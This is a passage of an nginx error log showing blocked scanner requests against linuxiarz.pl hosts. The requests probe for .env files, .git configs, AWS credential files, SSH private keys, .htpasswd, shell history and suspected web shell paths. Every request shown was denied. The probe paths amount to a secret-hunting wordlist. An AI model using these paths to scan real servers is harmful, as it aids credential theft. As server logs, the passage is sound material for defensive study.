rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /src/.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:16 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /src/.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:16 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /src/.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:16 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /src/.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:16 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /src/.env~ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:16 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /src/.git/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:16 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /src/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:16 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /src/.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:16 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /src/.git/logs/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:16 [error] 3135758#3135758: *180599 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /src/.gitignore HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:29 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /symfony/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:29 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /terraform/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:31 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /test/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:32 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /tmp/.aws/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:32 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /tmp/.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:32 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /tmp/.aws/keys.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:33 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /tmp/.aws/secrets.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:34 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /tmp/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:36 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /vault/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:36 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /vendor/.aws HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:36 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /vendor/.aws/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:36 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /vendor/.aws/credentials HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:36 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /vendor/.aws/keys.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:37 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /vendor/.aws/secrets.json HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:37 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /vendor/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:37 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /vendor/aws/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:39 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /web/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:39 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /web/.env.bak HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:39 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /web/.env.local HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:40 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /web/.env.old HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:40 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /web/.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:40 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /web/.env~ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:42 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /web/.git/ HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:42 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /web/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:42 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /web/.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:42 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /web/.git/logs/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:42 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /web/.gitignore HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:48 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /website/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:49 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /wordpress/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:50 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /www/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/12 02:31:51 [error] 3135758#3135758: *180808 access forbidden by rule, client: 185.177.72.104, server: nginx.linuxiarz.pl, request: "GET /xampp/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/15 21:31:03 [error] 3135759#3135759: *440693 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/08/23 00:33:33 [error] 1322112#1322112: *55155 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/08/28 00:00:12 [error] 3955564#3955564: *272469 access forbidden by rule, client: 48.210.17.168, server: nginx.linuxiarz.pl, request: "GET /.trash7309/index.php HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/28 10:54:15 [error] 3955564#3955564: *298265 access forbidden by rule, client: 45.130.203.207, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/30 01:55:13 [error] 1317#1317: *6838 access forbidden by rule, client: 20.41.83.178, server: nginx.linuxiarz.pl, request: "GET /.an5.php HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/08/30 06:14:25 [error] 1318#1318: *24740 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/08/30 16:15:04 [error] 1317#1317: *55715 access forbidden by rule, client: 52.230.10.177, server: nginx.linuxiarz.pl, request: "GET /.trash7309/index.php HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/06 07:20:30 [error] 2791659#2791659: *220076 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/09/08 14:53:00 [error] 2791659#2791659: *461099 access forbidden by rule, client: 52.187.129.59, server: nginx.linuxiarz.pl, request: "GET /.an5.php HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 00:11:16 [error] 2791659#2791659: *506556 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 00:11:16 [error] 2791659#2791659: *506558 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 00:11:16 [error] 2791659#2791659: *506560 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 00:11:17 [error] 2791659#2791659: *506561 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 00:11:17 [error] 2791660#2791660: *506565 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 00:11:17 [error] 2791659#2791659: *506568 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /application/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 00:11:19 [error] 2791659#2791659: *506575 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /backend/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 00:11:20 [error] 2791659#2791659: *506576 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 00:11:20 [error] 2791659#2791659: *506577 access forbidden by rule, client: 23.180.120.244, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 01:05:25 [error] 2791659#2791659: *511287 access forbidden by rule, client: 195.178.110.68, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 01:05:25 [error] 2791659#2791659: *511288 access forbidden by rule, client: 195.178.110.68, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 01:05:25 [error] 2791659#2791659: *511290 access forbidden by rule, client: 195.178.110.68, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 01:05:26 [error] 2791659#2791659: *511291 access forbidden by rule, client: 195.178.110.68, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 01:05:26 [error] 2791659#2791659: *511292 access forbidden by rule, client: 195.178.110.68, server: nginx.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 01:05:26 [error] 2791659#2791659: *511293 access forbidden by rule, client: 195.178.110.68, server: nginx.linuxiarz.pl, request: "GET /application/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 01:05:27 [error] 2791659#2791659: *511298 access forbidden by rule, client: 195.178.110.68, server: nginx.linuxiarz.pl, request: "GET /backend/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 01:05:27 [error] 2791659#2791659: *511299 access forbidden by rule, client: 195.178.110.68, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/09 01:05:27 [error] 2791659#2791659: *511301 access forbidden by rule, client: 195.178.110.68, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/12 13:21:32 [error] 2791659#2791659: *958017 access forbidden by rule, client: 207.244.244.113, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/12 17:59:38 [error] 2791659#2791659: *981598 access forbidden by rule, client: 93.93.113.18, server: kodi.linuxiarz.pl, request: "GET //.env HTTP/2.0", host: "kodi.linuxiarz.pl", referrer: "http://kodi.linuxiarz.pl//.env" +2025/09/13 03:42:50 [error] 2791659#2791659: *1018305 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/09/15 04:01:08 [error] 2791659#2791659: *1267720 access forbidden by rule, client: 216.81.248.61, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/15 16:00:10 [error] 2791659#2791659: *1317737 access forbidden by rule, client: 52.231.100.86, server: nginx.linuxiarz.pl, request: "GET /.lajuju.php HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/15 20:03:47 [error] 2791659#2791659: *1333036 access forbidden by rule, client: 195.178.110.15, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/15 20:03:47 [error] 2791659#2791659: *1333037 access forbidden by rule, client: 195.178.110.15, server: nginx.linuxiarz.pl, request: "GET /.env.save HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/15 20:03:47 [error] 2791659#2791659: *1333038 access forbidden by rule, client: 195.178.110.15, server: nginx.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/15 20:03:47 [error] 2791659#2791659: *1333040 access forbidden by rule, client: 195.178.110.15, server: nginx.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/15 20:03:47 [error] 2791659#2791659: *1333042 access forbidden by rule, client: 195.178.110.15, server: nginx.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/15 20:03:47 [error] 2791659#2791659: *1333043 access forbidden by rule, client: 195.178.110.15, server: nginx.linuxiarz.pl, request: "GET /application/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/15 20:03:50 [error] 2791659#2791659: *1333048 access forbidden by rule, client: 195.178.110.15, server: nginx.linuxiarz.pl, request: "GET /backend/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/15 20:03:50 [error] 2791659#2791659: *1333049 access forbidden by rule, client: 195.178.110.15, server: nginx.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/15 20:03:51 [error] 2791659#2791659: *1333050 access forbidden by rule, client: 195.178.110.15, server: nginx.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/19 20:16:11 [error] 2791659#2791659: *1652464 SSL_do_handshake() failed (SSL: error:0A0000EB:SSL routines::no application protocol) while handling frames, client: 138.246.253.7, server: 0.0.0.0:443 +2025/09/20 01:04:53 [error] 2791659#2791659: *1667838 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/20 01:04:53 [error] 2791659#2791659: *1667841 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.svn/wc.db HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/20 01:04:53 [error] 2791659#2791659: *1667842 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.gh/store/00manifest.i HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/20 01:55:16 [error] 2791659#2791659: *1673013 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/20 01:55:18 [error] 2791659#2791659: *1673016 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.svn/wc.db HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/20 01:55:18 [error] 2791659#2791659: *1673017 access forbidden by rule, client: 195.164.49.72, server: nginx.linuxiarz.pl, request: "GET /.gh/store/00manifest.i HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/20 01:55:27 [error] 2791659#2791659: *1673045 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/20 01:55:28 [error] 2791659#2791659: *1673046 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.svn/wc.db HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/20 01:55:28 [error] 2791659#2791659: *1673048 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.gh/store/00manifest.i HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/20 15:48:29 [error] 2791659#2791659: *1788158 access forbidden by rule, client: 207.244.244.113, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/21 10:34:06 [error] 2791659#2791659: *1913289 access forbidden by rule, client: 83.150.236.42, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2025/09/22 08:13:34 [error] 2791659#2791659: *2009825 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:13:36 [error] 2791659#2791659: *2009841 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:13:37 [error] 2791659#2791659: *2009849 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:13:41 [error] 2791659#2791659: *2009885 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:13:42 [error] 2791659#2791659: *2009889 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:13:43 [error] 2791659#2791659: *2009897 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.passwd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:13:45 [error] 2791659#2791659: *2009911 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:13:52 [error] 2791659#2791659: *2009955 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.svn HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:14:01 [error] 2791659#2791659: *2010027 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.inst/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:14:05 [error] 2791659#2791659: *2010043 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:14:06 [error] 2791659#2791659: *2010045 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:14:07 [error] 2791659#2791659: *2010058 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:14:10 [error] 2791659#2791659: *2010083 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:14:13 [error] 2791659#2791659: *2010103 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:14:22 [error] 2791659#2791659: *2010167 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.user.ini HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:14:29 [error] 2791659#2791659: *2010217 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.grunt/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:14:36 [error] 2791659#2791659: *2010255 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.komodotools HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:14:40 [error] 2791659#2791659: *2010289 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:14:43 [error] 2791659#2791659: *2010313 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.python-eggs HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:14:51 [error] 2791659#2791659: *2010362 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.pass HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:14:52 [error] 2791659#2791659: *2010374 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:14:53 [error] 2791659#2791659: *2010384 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:14:56 [error] 2791659#2791659: *2010410 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:15:06 [error] 2791659#2791659: *2010470 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:15:06 [error] 2791659#2791659: *2010472 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:15:07 [error] 2791659#2791659: *2010479 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.idea/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:15:10 [error] 2791659#2791659: *2010527 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:15:12 [error] 2791659#2791659: *2010545 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh/id_rsa HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:15:12 [error] 2791659#2791659: *2010553 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:15:29 [error] 2791659#2791659: *2010683 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 08:15:29 [error] 2791659#2791659: *2010687 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.ssh HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:32:43 [error] 2791659#2791659: *2058655 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:32:47 [error] 2791659#2791659: *2058679 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.codekit-cache HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:32:49 [error] 2791659#2791659: *2058688 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.hg HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:32:51 [error] 2791659#2791659: *2058705 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.wp-config.php.swp HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:32:51 [error] 2791659#2791659: *2058706 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.c9/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:32:51 [error] 2791659#2791659: *2058707 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.idea HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:32:53 [error] 2791659#2791659: *2058719 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.local HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:32:54 [error] 2791659#2791659: *2058724 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.DS_Store HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:32:56 [error] 2791659#2791659: *2058735 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.zip HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:32:56 [error] 2791659#2791659: *2058736 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.mc HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:02 [error] 2791659#2791659: *2058766 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.komodotools/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:04 [error] 2791659#2791659: *2058779 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.fontconfig/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:06 [error] 2791659#2791659: *2058787 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.svn/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:06 [error] 2791659#2791659: *2058790 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.bash_history HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:06 [error] 2791659#2791659: *2058792 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.settings HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:07 [error] 2791659#2791659: *2058793 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.cache/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:13 [error] 2791659#2791659: *2058828 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.listing HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:14 [error] 2791659#2791659: *2058839 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.htpasswd HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:16 [error] 2791659#2791659: *2058847 access forbidden by rule, client: 195.164.49.72, server: kodi.linuxiarz.pl, request: "GET /.mc/ HTTP/1.1", host: "kodi.linuxiarz.pl" +2025/09/22 19:33:20 [error] 